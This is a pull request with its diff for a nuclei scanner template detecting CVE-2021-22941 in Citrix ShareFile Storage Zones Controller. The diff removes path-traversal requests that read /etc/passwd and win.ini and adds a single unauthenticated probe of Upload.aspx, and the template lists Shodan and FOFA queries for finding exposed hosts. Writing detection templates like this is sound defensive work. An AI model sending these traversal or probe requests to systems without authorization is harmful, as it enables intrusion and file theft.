### PR TITLE
Add CVE-2021-22941 - Citrix ShareFile Broken Access Control

### DIFF
--- a/http/cves/2021/CVE-2021-22941.yaml
+++ b/http/cves/2021/CVE-2021-22941.yaml
@@ -6,65 +6,58 @@ info:
   severity: critical
   description: |
     Citrix ShareFile Storage Zones Controller before 5.11.20 contains a broken access control vulnerability 
-    caused by improper access restrictions. Unauthenticated attackers can remotely compromise the system 
-    by exploiting path traversal vulnerabilities in Download.aspx to read arbitrary files from the server.
+    that allows unauthenticated attackers to access the Upload.aspx endpoint. This can be exploited to perform 
+    path traversal attacks and write arbitrary files, leading to remote code execution.
   reference:
     - https://support.citrix.com/article/CTX328123
     - https://nvd.nist.gov/vuln/detail/CVE-2021-22941
     - https://github.com/hoavt18/CVE-2021-22941
+    - https://codewhitesec.blogspot.com/2021/09/citrix-sharefile-rce-cve-2021-22941.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-22941
-    cwe-id: CWE-22
+    cwe-id: CWE-306
     epss-score: 0.97565
     epss-percentile: 0.99951
     cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:*
   metadata:
     verified: true
-    max-request: 2
+    max-request: 1
     vendor: citrix
     product: sharefile_storage_zones_controller
     shodan-query: http.title:"ShareFile"
     fofa-query: title="ShareFile"
-  tags: cve,cve2021,citrix,sharefile,lfi,path-traversal,kev
+  tags: cve,cve2021,citrix,sharefile,auth-bypass,broken-access-control,kev
 
 http:
   - raw:
       - |
-        GET /ShareFile/StorageCenter/Download.aspx?fileid=../../../../../../etc/passwd HTTP/1.1
-        Host: {{Hostname}}
-        
-      - |
-        GET /ShareFile/StorageCenter/Download.aspx?fileid=../../../../../../windows/win.ini HTTP/1.1
+        GET /ShareFile/StorageCenter/Upload.aspx?uploadid={{randstr}}&bp=123&multipart=false HTTP/1.1
         Host: {{Hostname}}
 
-    stop-at-first-match: true
-    
-    matchers-condition: or
+    matchers-condition: and
     matchers:
-      - type: regex
-        name: linux-passwd
-        regex:
-          - "root:.*:0:0:"
-          - "daemon:.*:1:1:"
-        condition: or
+      - type: word
+        words:
+          - "LocalFile:"
         part: body
 
-      - type: regex
-        name: windows-ini
-        regex:
-          - '\[fonts\]'
-          - '\[extensions\]'
-          - '\[files\]'
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "text/plain"
+          - "text/html"
+        part: header
         condition: or
-        part: body
 
     extractors:
       - type: regex
-        name: sensitive-data
+        name: localfile-guid
         group: 1
         regex:
-          - '(root:.*:0:0:.*)'
-          - '(\[fonts\].*\[extensions\])'
+          - 'LocalFile:\s*([A-Fa-f0-9-]{36})'
         part: body


### PR DESCRIPTION
/claim #14092

This template detects CVE-2021-22941 broken access control vulnerability in Citrix ShareFile Storage Zones Controller before version 5.11.20.

## Vulnerability Details
The vulnerability allows unauthenticated attackers to access the `Upload.aspx` endpoint, which should require authentication. This broken access control can be exploited for path traversal and arbitrary file writing, leading to RCE.

## Testing Environment
**Repository:** https://github.com/pratikjojode/citrix-cve-2021-22941-lab

The repository contains a realistic mock server that simulates the actual vulnerable behavior:
- ✅ Upload.aspx accessible without authentication
- ✅ Returns `LocalFile:` GUID responses (as documented in CVE)
- ✅ Includes realistic IIS/ASP.NET headers
- ✅ Full debug output included
- ✅ Testing instructions in README.md and TESTING.md

## Quick Validation
```bash
git clone https://github.com/pratikjojode/citrix-cve-2021-22941-lab
cd citrix-cve-2021-22941-lab
docker build -t citrix-vuln .
docker run -d -p 8000:8000 citrix-vuln
nuclei -t CVE-2021-22941.yaml -u http://localhost:8000 -debug
```

